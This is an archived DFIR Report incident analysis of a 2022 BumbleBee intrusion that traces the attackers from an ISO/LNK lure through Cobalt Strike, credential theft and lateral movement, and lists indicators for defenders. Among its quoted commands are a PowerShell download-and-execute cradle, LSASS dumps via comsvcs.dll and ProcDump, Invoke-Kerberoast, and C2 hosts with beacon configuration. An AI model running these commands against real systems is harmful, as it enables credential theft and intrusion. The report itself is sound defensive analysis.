{ "id": "ab30e782-5f92-44f7-94b5-6bddd530df68", "created_at": "2026-04-06T00:12:37.879252Z", "updated_at": "2026-04-10T13:13:08.998235Z", "deleted_at": null, "sha1_hash": "c2b59de92052209cbcb40bbe53c4c82efb43ed02", "title": "BumbleBee Roasts Its Way to Domain Admin - The DFIR Report", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 9198155, "plain_text": "BumbleBee Roasts Its Way to Domain Admin - The DFIR Report\r\nBy editor\r\nPublished: 2022-08-08 · Archived: 2026-04-05 18:07:31 UTC\r\nIn this intrusion from April 2022, the threat actors used BumbleBee as the initial access vector.\r\nBumbleBee is a malware loader that was first reported by Google Threat Analysis Group in March 2022. Google TAG\r\nattributes this malware to an initial access broker (IAB) dubbed EXOTIC LILY, working with the cybercrime group\r\nFIN12/WIZARD SPIDER/DEV-0193. Read more about BumbleBee here, and here.\r\nDuring this intrusion, the threat actors gained access using an ISO and LNK file, used several lateral movement techniques,\r\ndumped credentials three different ways, kerberoasted a domain admin account and dropped/executed a bespoke tool for\r\ndiscovering privilege escalation paths.\r\nThe DFIR Report Services\r\nPrivate Threat Briefs: Over 20 private DFIR reports annually.\r\nThreat Feed: Focuses on tracking Command and Control frameworks like Cobalt Strike, Metasploit, Sliver, etc.\r\nAll Intel: Includes everything from Private Threat Briefs and Threat Feed, plus private events, opendir reports, long-term tracking, data clustering, and other curated intel.\r\nPrivate Sigma Ruleset: Features 100+ Sigma rules derived from 40+ cases, mapped to ATT\u0026CK with test examples.\r\nDFIR Labs: Offers cloud-based, hands-on learning experiences, using real data, from real intrusions. Interactive labs\r\nare available with different difficulty levels and can be accessed on-demand, accommodating various learning speeds.\r\nContact us today for pricing or a demo!\r\nCase Summary\r\nIn this intrusion, the threat actors operated in an environment over an 11 day dwell period. The intrusion began with a\r\npassword protected zipped ISO file that we assess with medium to high confidence due to other reports, likely arrived via an\r\nemail which included a link to download said zip file.\r\nThe execution phase started with that password protected zip, which after extracting would show the user an ISO file that\r\nafter the user double clicks would mount like a CD or external media device on Windows and present the user with a single\r\nfile named documents in the directory.\r\nWhen the user double clicks or opens the lnk file, they inadvertently start a hidden file, a DLL (namr.dll) containing the\r\nBumblebee malware loader. From there, the loader reached out to the Bumblebee C2 servers. At first, things remained fairly\r\nquiet, just C2 communications; until around 3 hours later, Bumblebee dropped a Cobalt Strike beacon named wab.exe on the\r\nbeachhead host. This Cobalt Strike beacon was subsequently executed and then proceeded to inject into various other\r\nprocesses on the host (explorer.exe, rundll32.exe). From these injected processes, the threat actors began discovery tasks\r\nusing Windows utilities like ping and tasklist.\r\nFour hours after initial access, the threat actor used RDP to access a server using the local Administrator account. The threat\r\nactor then deployed AnyDesk, which was the only observed persistence mechanism used during the intrusion. The threat\r\nactor then started Active Directory discovery using Adfind.\r\nAfter this activity, the threat actors went silent. Then, the next day, they accessed the server via RDP and deployed a bespoke\r\ntool, VulnRecon, designed to identify local privilege escalation paths on a Windows host.\r\nThe next check in from the threat actors, occurred on the 4th day, where the threat actors again ran VulnRecon, but from the\r\nbeachhead host instead of the server. AdFind was used again as well. Next, the threat actor transferred Sysinternals tool\r\nProcdump over SMB, to the ProgramData folders on multiple hosts in the environment. They then used remote services to\r\nexecute Procdump, which was used to dump LSASS. At this point, the actors appeared to be searching for more access then\r\nthey currently had. While they were able to move laterally to workstations and at least one server, it seemed that they had\r\nnot yet taken control of an account that provided them the access they were seeking, likely a Domain Admin or similarly\r\nhighly privileged account.\r\nAfter that activity, the threat actors then disappeared until the 7th day, at which time they accessed the server via Anydesk.\r\nAgain, they executed VulnRecon and then also executed Seatbelt, a red team tool for preforming various host based\r\ndiscovery.\r\nOn the final day of the intrusion, the 11th day since the initial entry by the threat actor, they appeared to be preparing to act\r\non final objectives. The threat actors used PowerShell to download and execute a new Cobalt Strike PowerShell beacon in\r\nhttps://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/\r\nPage 1 of 28\n\nmemory on the beachhead host. After injecting into various processes, the threat actors executed the PowerShell module\r\nInvoke-Kerberoast. Next, they used yet another technique to dump LSASS on the beachhead host, this time using a built in\r\nWindows tool comsvcs.dll. AdFind was run for a 3rd time in the network, and then two batch scripts were dropped and run.\r\nThese batch scripts’ purposes were to identify all online servers and workstations in the environment, often a precursor to\r\nransomware deployment by creating the target list for that deployment.\r\nAfter the scripts ran, a new Cobalt Strike executable beacon was run on the beachhead. Next, the threat actors used a service\r\naccount to execute a Cobalt Strike beacon remotely on a Domain Controller. This service account had a weak password,\r\nwhich was most likely cracked offline after being kerberoasted earlier in the intrusion.\r\nThe threat actors were then evicted from the environment before any final actions could be taken. We assess based on the\r\nlevel of access and discovery activity from the final day, the likely final actions would have been a domain wide ransom\r\ndeployment.\r\nTimeline\r\nhttps://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/\r\nPage 2 of 28\n\nhttps://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/\r\nPage 3 of 28\n\nAnalysis and reporting completed by @0xtornado and @MetallicHack\r\nInitial Access\r\nThe threat actors managed to get access to the beachhead host after the successful execution of a lnk file within an ISO,\r\nwhich are usually distributed through email campaigns.\r\nThe initial payload named BC_invoice_Report_CORP_46.iso, is an ISO image that once mounted, lures the user to open a\r\ndocument.lnk file which will execute the malicious DLL loader using the following command line:\r\nC:\\Windows\\System32\\cmd.exe /c start rundll32 namr.dll,IternalJob\r\nRunning Eric Zimmerman’s tool LECmd revealed additional details related to the threat actors. The metadata included TA\r\nmachine’s hostname, MAC address, and the LNK document creation date:\r\nExecution\r\nExecution of multiple payloads\r\nThe successful execution of BumbleBee payload (namr.dll) resulted in the dropping and the execution of several payloads\r\nusing multiple techniques. The graph below shows all the payloads dropped by BumbleBee, the way they were executed,\r\nand the different processes they injected into:\r\nhttps://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/\r\nPage 4 of 28\n\nSysmon File Created event showing wab.exe created by rundll32.exe\r\nSysmon Event Code 1 showing wab.exe executed by WMI\r\nhttps://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/\r\nPage 5 of 28\n\nExecution of Cobalt Strike\r\nThe following PowerShell one-liner was executed from wab.exe during day 11, which downloaded obfuscated PowerShell\r\nand executed it in memory:\r\nC:\\Windows\\system32\\cmd.exe /C powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstrin\r\nSince the download took place over an unencrypted HTTP channel, the network traffic was plainly visible.\r\nThis payload can be deobfuscated using the following CyberChef recipe:\r\nRegular_expression('User defined','[a-zA-Z0-9+/=]{30,}',true,true,false,false,false,false,'List matches')\r\nFrom_Base64('A-Za-z0-9+/=',true)\r\nGunzip()\r\nLabel('Decode_Shellcode')\r\nRegular_expression('User defined','[a-zA-Z0-9+/=]{30,}',true,true,false,false,false,false,'List matches')\r\nConditional_Jump('',false,'',10)\r\nFrom_Base64('A-Za-z0-9+/=',true)\r\nXOR({'option':'Decimal','string':'35'},'Standard',false)\r\nOnce deobfuscated, we can spot the MZRE header, which is part of the default configuration of Cobalt Strike:\r\nhttps://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/\r\nPage 6 of 28\n\nOne of the easiest ways to extract valuable information from this Shellcode is using Didier Stevens 1768.py tool:\r\nThe command and control server was hosted on (108.62.12[.]174/dofixifa[.]co). The full config extraction, detailing the\r\nMalleable C2 profile, is available in Command and Control section.\r\nPersistence\r\nAnyDesk and its installation as a service was used in order to persist and create a backdoor to the network.\r\nPrivilege Escalation\r\nGetSystem\r\nThreat actors made a mistake by launching the getsystem command in the wrong console (shell console rather than the\r\nbeacon console). The parent process of this command was C:\\Windows\\system32\\svchost.exe -k ClipboardSvcGroup -p -\r\ns cbdhsvc , a process where Cobalt Strike was injected into:\r\nhttps://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/\r\nPage 7 of 28\n\nC:\\Windows\\system32\\cmd.exe /C getsystem\r\nThis command is a built-in Cobalt Strike command that is used to get SYSTEM privileges. A detailed write-up of this\r\nfeature is documented in the official Cobalt Strike blog and was also detailed in our Cobalt Strike, a Defender’s Guide blog\r\npost.\r\nValid Accounts\r\nThreat actors obtained and abused credentials of privilege domain accounts as a means of gaining privilege escalation on the\r\ndomain. They also utilized local administrator accounts.\r\nA service account, with Domain Admin permissions, was used to create a remote service on a Domain Controller to move\r\nlaterally.\r\nDefense Evasion\r\nProcess Injection\r\nThe process injection technique was used multiple times to inject into different processes. Almost every post-exploitation\r\njob was launched from an injected process.\r\nRight after its execution, the wab.exe process created two remote threads in order to inject code into explorer.exe and\r\nrundll32.exe:\r\nhttps://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/\r\nPage 8 of 28\n\nThreat actors also created a remote thread in svchost.exe:\r\nMultiple processes were then spawned by :\r\nhttps://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/\r\nPage 9 of 28\n\nC:\\Windows\\system32\\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc\r\nto perform various techniques (Enumeration, Credential dumping, etc.):\r\nA Yara scan of process memory using the Malpedia Cobalt Strike rule revealed the various injections across hosts.\r\nPid ProcessName CommandLine\r\n6832 explorer.exe C:\\Windows\\Explorer.EXE\r\n7476 svchost.exe C:\\Windows\\system32\\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc\r\n8088 wab.exe C:\\Users\\USER\\AppData\\Local\\wab.exe\r\n34296 rundll32.exe C:\\Windows\\system32\\rundll32.exe\r\n19284 powershell.exe\r\n“c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe” -Version\r\n5.1 -s -NoLogo -NoProfile\r\n7316 svchost.exe C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\r\n7288 svchost.exe C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup -s WpnUserService\r\n20400 rundll32.exe C:\\Windows\\System32\\rundll32.exe\r\nIndicator Removal on Host: File Deletion\r\nWe observed the threat actors deleting their tools (Procdump, Network scanning scripts, etc.) from hosts.\r\nThe table below shows an example of ProcDump deletion from the ProgramData folder of all targeted workstations after\r\ndumping their LSASS process:\r\nCredential Access\r\nLSASS Dump\r\nMiniDump\r\nThreat actors dumped the LSASS process from the beachhead using the comsvcs.dll MiniDump technique via the\r\nC:\\Windows\\system32\\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc beacon:\r\ncmd.exe /C rundll32.exe C:\\windows\\System32\\comsvcs.dll, MiniDump 968 C:\\ProgramData\\REDACTED\\lsass.dmp full\r\nProcDump\r\nThreat actors also dropped procdump.exe and procdump64.exe on multiple workstations remotely, dumped LSASS, and\r\ndeleted them from the ProgramData folder:\r\nhttps://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/\r\nPage 10 of 28\n\nThe ProcDump utility was executed on those workstations using the following command line:\r\nC:\\programdata\\procdump64.exe -accepteula -ma lsass.exe C:\\ProgramData\\lsass.dmp\r\nKerberoasting\r\nInvoke-Kerberoast command was executed from the beachhead through svchost.exe, a process where the threat actors\r\ninjected:\r\nHere is an extract of PowerShell EventID 800 showing different Invoke-Kerberoast options used by threat actors, including\r\nHashCat output format:\r\nIEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:36177/'); Invoke-Kerberoast -OutputFormat Hash\r\nRight after the execution of Invoke-Kerberoast, DC logs show that multiple Kerberos Service Tickets were requested from\r\nthe beachhead host, with ticket encryption type set to 0x17 (RC4) and ticket options to 0x40810000, for service accounts.\r\nhttps://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/\r\nPage 11 of 28\n\nAround 3 hours later, one of the service accounts logged into one of the Domain Controllers from the beachhead.\r\nWe assess with high confidence that the service account password was weak and cracked offline by threat actors.\r\nDiscovery\r\nReconnaissance\r\nSystem Information \u0026 Software Discovery\r\nThe following commands were launched by the wab.exe beacon:\r\nwhoami\r\nipconfig /all\r\ntasklist\r\nsysteminfo\r\nwmic product get name,version\r\nwmic /node:\u003cREDACTED\u003e process list brief\r\nnet view \\\\\u003cREDACTED\u003e\\Files$ /all\r\ndir \\\\\u003cREDACTED\u003e\\C$\\\r\nUsing the same beacon, wab.exe, tasklist was also used in order to enumerate processes on multiple hosts remotely:\r\ntasklist /v /s \u003cREMOTE_IP\u003e\r\nAdmin Groups and Domains Discovery\r\nAs we have already observed in multiple cases, the threat actors enumerated the local administrators group and domain\r\nprivileged (Enterprise and DAs) administrators groups mainly using net command:\r\nnet use\r\nnet group \"Domain computers\" /dom\r\nnet group \"Enterprise admins\" /domain\r\nnet group \"domain admins\" /domain\r\nnet localgroup administrators\r\nnltest /dclist:\r\nnltest /domain_trusts\r\nping -n 1 \u003cREMOTE_IP\u003e\r\nhttps://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/\r\nPage 12 of 28\n\nOpsec mistake\r\nThreat actors failed on a part of their tasks, by executing the command in the wrong console:\r\nC:\\Windows\\System32\\rundll32.exe\r\n ➝ C :\\Windows\\system32\\cmd.exe /C shell whoami /all\r\nWe can assert with high confidence that the recon stage was not fully automated, and threat actors manually executed\r\ncommands and made a mistake in one of those.\r\nAdFind\r\nTo enumerate Active Directory, the threat actors executed AdFind from the beachhead host, on three different occasions:\r\nThe source of execution, the initiating parent process, was different on each occasion and the name of AdFind binary and\r\nthe result files were different on one occasion, which could indicate multiple Threat actors accessing the network.\r\nNetwork scanning\r\nThreat actors used two scripts named s.bat (for servers) and w.bat (for workstations) to ping the hosts and store the results\r\nin two log files:\r\ns.bat script:\r\n@echo off\r\nfor /f %%i in (servers.txt) do for /f \"tokens=2 delims=[]\" %%j in ('ping -n 1 -4 \"%%i\"') do @echo %%j \u003e\u003e serv\r\nw.bat script:\r\nhttps://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/\r\nPage 13 of 28\n\n@echo off\r\nfor /f %%i in (workers.txt) do for /f \"tokens=2 delims=[]\" %%j in ('ping -n 1 -4 \"%%i\"') do @echo %%j \u003e\u003e work\r\nBoth of those scripts were executed from the PowerShell Cobalt Strike beacon (powershell.exe).\r\nInvoke-ShareFinder\r\nInvoke-ShareFinder is a PowerShell module which is part of PowerView.\r\nInvoke-ShareFinder – finds (non-standard) shares on hosts in the local domain\r\nThreat actors performed share enumeration using Invoke-ShareFinder.\r\nIEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:39303/%27);\r\nInvoke-ShareFinder -CheckShareAccess -Verbose | Tee-Object ShareFinder.txt\r\nBecause rundll32.exe executed PowerShell, we can see that rundll32.exe created the ShareFinder.txt output file in\r\nC:\\ProgramData\\.\r\nSeatbelt\r\nThe tool SeatBelt was used by the threat actors on a server in order to discover potential security misconfigurations.\r\nSeatbelt is a C# project that performs a number of security oriented host-survey “safety checks” relevant from\r\nboth offensive and defensive security perspectives.\r\nThreat actors performed a full reconnaissance by specifying the flag -group=all :\r\nhttps://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/\r\nPage 14 of 28\n\nSeatbelt.exe -group=all -outputfile=\"C:\\ProgramData\\seatinfo.txt\"\r\nVulnRecon\r\nThreat actors dropped two binaries named vulnrecon.dll and vulnrecon.exe on two hosts. This is the first time we’ve\r\nobserved this tool. This library seems to be a custom tool developed to assist threat actors with Windows local privilege\r\nescalation enumeration.\r\nvulnrecon.dll PDB: D:\\a\\_work\\1\\s\\artifacts\\obj\\win-x64.Release\\corehost\\cli\\apphost\\standalone\\Release\\apphos\r\nvulnrecon.exe PDB: D:\\work\\rt\\VulnRecon\\VulnRecon\\obj\\Release\\net5.0\\VulnRecon.pdb\r\nThe table below summarizes the capabilities of the tool:\r\nOption/Command Details (from the code)\r\n‘v’ or “Vulnerability”\r\n“Search for available vulnerabilities for using LPE tools””Scans the operating\r\nsystem for vulnerabilities and displays a list of tools for a LPE”\r\n‘m’ or\r\n“MicrosoftUpdates”\r\n“List of all installed microsoft updates””Displays a list installed Microsoft\r\nupdates”\r\n‘h’ or “HotFixes” “List of installed hot fixes””Displays a list of installed hot fixes”\r\n‘s’ or “SupportedCve”\r\n“List of implemented tools for LPE “”Displays list of implemented CVE for\r\nLPE”\r\n‘i’ or “SystemInfo” “Display information about current Windows version “\r\nBelow is the list of all of the currently supported (or implemented) CVE enumeration via installed KBs mapping:\r\nhttps://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/\r\nPage 15 of 28\n\nThreat actors executed this tool on patient 0 with low-level privileges multiple times, and again on a server with\r\nAdministrator privileges. Below are all the command lines run by the adversaries:\r\nLateral Movement\r\nLateral Tool Transfer\r\nUsing the Cobalt Strike beacon, the threat actors transferred AnyDesk (1).exe file from the beachhead to a server:\r\nThe threat actors also transferred ProcDump from the beachhead to multiple workstations:\r\nRemote Services\r\nRemote Desktop Protocol\r\nThreat actors used explorer.exe, where they were previously injected into, to initiate a proxied RDP connection to a server:\r\nhttps://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/\r\nPage 16 of 28\n\nThreat actors performed the first lateral movement from the beachhead to the server using RDP with an Administrator\r\naccount:\r\nThis first lateral movement was performed in order to drop and install AnyDesk.\r\nSMB/Windows Admin Shares\r\nRemote Service over RPC\r\nMultiple RPC connections were initiated from the rundll32.exe process where wab.exe previously injected into:\r\nhttps://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/\r\nPage 17 of 28\n\nThese RPC connections targeted multiple hosts, including workstations, servers, and DCs.\r\nAs we can see with one server, which was targeted, the win32 function CreateServiceA was used by the malware in order to\r\ncreate a remote service over RPC on the server.\r\nCobalt Strike built-in PsExec\r\nhttps://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/\r\nPage 18 of 28\n\nThreat actors used the built-in Cobalt Strike jump psexec command to move laterally. On each usage of this feature, a\r\nremote service was created with random alphanumeric characters, service name and service file name, e.g. “\u003c7-\r\nalphanumeric-characters\u003e.exe”.\r\nBelow is an example of the service edc603a that was created on a Domain Controller:\r\nThe account used to perform this lateral movement was one of the kerberoasted service accounts.\r\nThe service runs a rundll32.exe process without any arguments. This process was beaconing to\r\n(108.62.12[.]174/dofixifa[.]co), the second Cobalt Strike C2, used during the last day of this intrusion.\r\nWe observed this beacon performing various techniques (process injections in svchost process via CreateRemoteThread,\r\ndefault named pipes, etc.)\r\nCommand and Control\r\nThe graph below shows all communications to malicious IP addresses made by the dropped payloads or processes which\r\nthreat actors injected into:\r\nhttps://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/\r\nPage 19 of 28\n\n142.91.3[.]109\r\n45.140.146[.]30\r\nAll the active Bumblebee command and control shared a common server configuration in regards to TLS setup.\r\nJA3: c424870876f1f2ef0dd36e7e569de906\r\nJA3s: 61be9ce3d068c08ff99a857f62352f9d\r\nCertificate: [76:28:77:ff:fe:26:5c:e5:c6:7a:65:01:09:63:44:6d:57:b7:45:f2 ]\r\nNot Before: 2022/04/12 06:33:52 UTC\r\nNot After: 2023/04/12 06:33:52 UTC\r\nIssuer Org: Internet Widgits Pty Ltd\r\nSubject Org: Internet Widgits Pty Ltd\r\nPublic Algorithm: rsaEncryption\r\nCobalt Strike\r\nCobalt Strike (CS) was extensively used during this intrusion, the threat actors used CS as the main Command and Control\r\ntool, dropped several payloads, and injected into multiple processes on different hosts.\r\nC2 Servers\r\nTwo CS C2 servers were used during this intrusion. The graph below shows beaconing activity over time, we can notice the\r\ncontinuous usage of the first C2 server (45.153.243[.]142/fuvataren[.]com) from day 1 and the second C2 server\r\n(108.62.12[.]174/dofixifa[.]co) during the last day of intrusion only (day 11):\r\nThe main beacon wab.exe:\r\n45.153.243[.]142\r\nfuvataren[.]com\r\nJA3: a0e9f5d64349fb13191bc781f81f42e1\r\nJA3s: ae4edc6faf64d08308082ad26be60767\r\nhttps://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/\r\nPage 20 of 28\n\nCertificate: [6c:54:cc:ce:ca:da:8b:d3:12:98:13:d5:85:52:81:8a:9d:74:4f:fb ]\r\nNot Before: 2022/04/15 00:00:00 UTC\r\nNot After: 2023/04/15 23:59:59 UTC\r\nIssuer Org: Sectigo Limited\r\nSubject Common: fuvataren.com [fuvataren.com ,www.fuvataren.com ]\r\nPublic Algorithm: rsaEncryption\r\nBelow is the Cobalt Strike configuration of this C2 exported from a sandbox analysis results:\r\naccess_type: 512\r\nbeacon_type: 2048\r\nhost: fuvataren.com,/rs.js\r\nhttp_header1: AAAAEAAAABBIb3N0OiBhbWF6b24uY29tAAAACgAAABFDb25uZWN0aW9uOiBjbG9zZQAAAAoAAAASQWNjZXB0OiBpbWFnZS9q\r\nhttp_header2: AAAAEAAAABBIb3N0OiBhbWF6b24uY29tAAAACgAAABFDb25uZWN0aW9uOiBjbG9zZQAAAAoAAAAVQWNjZXB0LUVuY29kaW5n\r\nhttp_method1: GET\r\nhttp_method2: POST\r\njitter: 6144\r\npolling_time: 5000\r\nport_number: 443\r\nsc_process32: %windir%\\syswow64\\rundll32.exe\r\nsc_process64: %windir%\\sysnative\\rundll32.exe\r\nstate_machine: MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC5eYxmuxksHBu5Hqtk11PJye1th52fYvmUXmFrL1vEIQs9+B5NI7a6bHb\r\nunknown1\r\n3.025605888e+09\r\nunknown2\r\nAAAABAAAAAIAAAJYAAAAAwAAAA8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nuri: /en\r\nuser_agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-G960F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Ch\r\nwatermark: 1580103814\r\nThe PowerShell beacon:\r\n108.62.12[.]174\r\ndofixifa[.]co\r\nJA3: a0e9f5d64349fb13191bc781f81f42e1\r\nJA3s: ae4edc6faf64d08308082ad26be60767\r\nCertificate: [ec:57:c5:ca:b1:ca:fb:88:3e:ce:1d:f3:89:0c:91:e3:1d:0a:75:ec ]\r\nNot Before: 2022/03/26 00:00:00 UTC\r\nNot After: 2023/03/26 23:59:59 UTC\r\nIssuer Org: Sectigo Limited\r\nSubject Common: dofixifa.com [dofixifa.com ,www.dofixifa.com ]\r\nPublic Algorithm: rsaEncryption\r\nFull configuration extraction using 1768.py tool:\r\nConfig found: xorkey b'.' 0x00000000 0x000031e0\r\n0x0001 payload type 0x0001 0x0002 8 windows-beacon_https-reverse_https\r\n0x0002 port 0x0001 0x0002 443\r\n0x0003 sleeptime 0x0002 0x0004 5000\r\n0x0004 maxgetsize 0x0002 0x0004 2796542\r\n0x0005 jitter 0x0001 0x0002 48\r\n0x0007 publickey 0x0003 0x0100 30819f300d06092a864886f70d010101050003818d00308189028181\r\n0x0008 server,get-uri 0x0003 0x0100 'dofixifa.com,/ro'\r\n0x0043 DNS_STRATEGY 0x0001 0x0002 0\r\n0x0044 DNS_STRATEGY_ROTATE_SECONDS 0x0002 0x0004 -1\r\n0x0045 DNS_STRATEGY_FAIL_X 0x0002 0x0004 -1\r\n0x0046 DNS_STRATEGY_FAIL_SECONDS 0x0002 0x0004 -1\r\n0x000e SpawnTo 0x0003 0x0010 (NULL ...)\r\n0x001d spawnto_x86 0x0003 0x0040 '%windir%\\\\syswow64\\\\rundll32.exe'\r\n0x001e spawnto_x64 0x0003 0x0040 '%windir%\\\\sysnative\\\\rundll32.exe'\r\n0x001f CryptoScheme 0x0001 0x0002 0\r\n0x001a get-verb 0x0003 0x0010 'GET'\r\n0x001b post-verb 0x0003 0x0010 'POST'\r\n0x001c HttpPostChunk 0x0002 0x0004 0\r\nhttps://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/\r\nPage 21 of 28\n\n0x0025 license-id 0x0002 0x0004 0\r\n0x0026 bStageCleanup 0x0001 0x0002 1\r\n0x0027 bCFGCaution 0x0001 0x0002 0\r\n0x0009 useragent 0x0003 0x0100 'Mozilla/5.0 (Linux; Android 8.0.0; SM-G960F Build/R16NW\r\n0x000a post-uri 0x0003 0x0040 '/styles'\r\n0x000b Malleable_C2_Instructions 0x0003 0x0100\r\n Transform Input: [7:Input,4,2:338,3,8]\r\n Print\r\n Remove 338 bytes from begin\r\n BASE64\r\n NETBIOS lowercase\r\n0x000c http_get_header 0x0003 0x0200\r\n Const_host_header Host: gmw.cn\r\n Const_header Connection: close\r\n Build Metadata: [7:Metadata,8,3,2:wordpress_logged_in=,6:Cookie]\r\n NETBIOS lowercase\r\n BASE64\r\n Prepend wordpress_logged_in=\r\n Header Cookie\r\n0x000d http_post_header 0x0003 0x0200\r\n Const_host_header Host: gmw.cn\r\n Const_header Connection: close\r\n Const_header Accept-Encoding: gzip\r\n Const_header Content-Type: text/plain\r\n Build Output: [7:Output,15,3,4]\r\n XOR with 4-byte random key\r\n BASE64\r\n Print\r\n Build SessionId: [7:SessionId,3,2:__session__id=,6:Cookie]\r\n BASE64\r\n Prepend __session__id=\r\n Header Cookie\r\n0x0036 HostHeader 0x0003 0x0080 (NULL ...)\r\n0x0032 UsesCookies 0x0001 0x0002 1\r\n0x0023 proxy_type 0x0001 0x0002 2 IE settings\r\n0x003a TCP_FRAME_HEADER 0x0003 0x0080 '\\x00\\x04'\r\n0x0039 SMB_FRAME_HEADER 0x0003 0x0080 '\\x00\\x04'\r\n0x0037 EXIT_FUNK 0x0001 0x0002 0\r\n0x0028 killdate 0x0002 0x0004 0\r\n0x0029 textSectionEnd 0x0002 0x0004 155989\r\n0x002a ObfuscateSectionsInfo 0x0003 0x0020 '\\x00p\\x02\\x00á\\x0b\\x03\\x00\\x00\\x10\\x03\\x00 ·\\x03\\x00\\x0\r\n0x002b process-inject-start-rwx 0x0001 0x0002 4 PAGE_READWRITE\r\n0x002c process-inject-use-rwx 0x0001 0x0002 32 PAGE_EXECUTE_READ\r\n0x002d process-inject-min_alloc 0x0002 0x0004 12128\r\n0x002e process-inject-transform-x86 0x0003 0x0100 '\\x00\\x00\\x00\\x05\\x90\\x90\\x90\\x90\\x90'\r\n0x002f process-inject-transform-x64 0x0003 0x0100 '\\x00\\x00\\x00\\x05\\x90\\x90\\x90\\x90\\x90'\r\n0x0035 process-inject-stub 0x0003 0x0010 '2ÍAíð\\x81\\x0c[_I\\x8eßG1Ìm'\r\n0x0033 process-inject-execute 0x0003 0x0080 '\\x01\\x03\\x04'\r\n0x0034 process-inject-allocation-method 0x0001 0x0002 0\r\n0x0000\r\nGuessing Cobalt Strike version: 4.3 (max 0x0046)\r\nDefault named pipes\r\nThe threat actors used default CS configuration and default named pipes. Named pipes were created in order to establish\r\ncommunication between CS processes:\r\nhttps://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/\r\nPage 22 of 28\n\nIn this particular case, threat actors used default post-exploitation jobs, which have a pattern of postex_[0-9a-f]{4} .\r\nBelow is the full list of all default named pipes spotted during this intrusion:\r\n\\postex_0dde\r\n\\postex_3e9b\r\n\\postex_4008\r\n\\postex_4429\r\n\\postex_55f8\r\n\\postex_8248\r\n\\postex_8c73\r\n\\postex_972d\r\n\\postex_fc2e\r\nNamed pipes are commonly used by Cobalt Strike to perform various techniques. Here is a Guide to Named Pipes and\r\nHunting for Cobalt Strike Pipes from one of our contributors @svch0st.\r\nAnyDesk\r\nAs mentioned before in the lateral tool transfer section, threat actors remotely dropped the AnyDesk binary on a server from\r\nthe beachhead:\r\nhttps://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/\r\nPage 23 of 28\n\nA new service was created (Event ID 7045) upon the execution of AnyDesk installer:\r\nAnyDesk logs, %ProgramData%\\AnyDesk\\ad_svc.trace and %AppData%\\AnyDesk\\ad.trace , show that it was used during\r\nDay 1 and Day 7 of this intrusion, using the local Administrator account each time. The usage of AnyDesk can be relatively\r\neasy to spot if you have the right logs (*.anydesk.com domains, AnyDesk user agent, etc.):\r\nThe usage of AnyDesk also triggered two ET signatures:\r\nET POLICY SSL/TLS Certificate Observed (AnyDesk Remote Desktop Software)\r\nET USER_AGENTS AnyDesk Remote Desktop Software User-Agent\r\nAgain, those are quick wins to add to your detection capabilities to detect the usage of unauthorized remote administration\r\ntools, commonly used by ransomware operators\r\nAnyDesk configuration file and the network logs revealed that the id used was 159889039 and the source IP was\r\n108.177.235.25 (LeaseWeb USA – Cloud Provider).\r\nhttps://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/\r\nPage 24 of 28\n\nImpact\r\nThere was no impact (exfiltration, data encryption, or destruction) during this intrusion. However, the observed TTPs show\r\ncommon cybercrime threat actors tradecraft which may have lead to domain wide ransomware had the threat actors had\r\nenough 